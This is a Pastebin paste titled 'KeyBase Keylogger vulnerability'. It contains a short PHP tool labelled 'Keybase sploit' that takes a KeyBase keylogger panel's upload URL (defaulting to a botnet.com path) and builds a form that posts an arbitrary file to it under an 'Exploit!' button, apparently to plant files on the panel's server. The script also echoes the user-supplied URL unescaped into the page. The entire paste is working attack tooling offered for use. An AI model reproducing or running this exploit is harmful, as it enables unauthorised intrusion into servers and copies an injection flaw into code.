xrahitel

KeyBase Keylogger vulnerability

Oct 26th, 2017
181
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.91 KB | None | 0 0
  1. <?php
  2. if (!isset($_GET['url'])){
  3. echo "
  4. <!DOCTYPE html>
  5. <html>
  6. <head>
  7. <title>Virus-Tracker</title>
  8. </head>
  9. <body>
  10. <center><h1>Keybase sploit</h1><br></center>
  11. <center><h2>Step 1: Enter keybase domain url: </h2><br></center>
  12. <form action=\"keybase.php\" method=\"GET\">
  13. <input name=\"url\" type=\"text\" id=\"url\" value=\"http://botnet.com/keybase/image/upload.php\" size=\"200\"/>
  14. <input type=\"submit\" value=\"Next\"></p>
  15. </form>
  16. </body>
  17. </html>
  18. ";
  19. } else {
  20. $url = $_GET['url'];
  21. echo "
  22. <!DOCTYPE html>
  23. <html>
  24. <head>
  25. <title>Отправка файла на сервер</title>
  26. </head>
  27. <body>
  28. <form action=\"$url\" method=\"post\" enctype=\"multipart/form-data\">
  29. <p><input type=\"file\" name=\"file\">
  30. <input type=\"submit\" value=\"Exploit!\"></p>
  31. </form>
  32. </body>
  33. </html>
  34. ";
  35. }
  36. ?>
Advertisement
Add Comment
Please, Sign In to add comment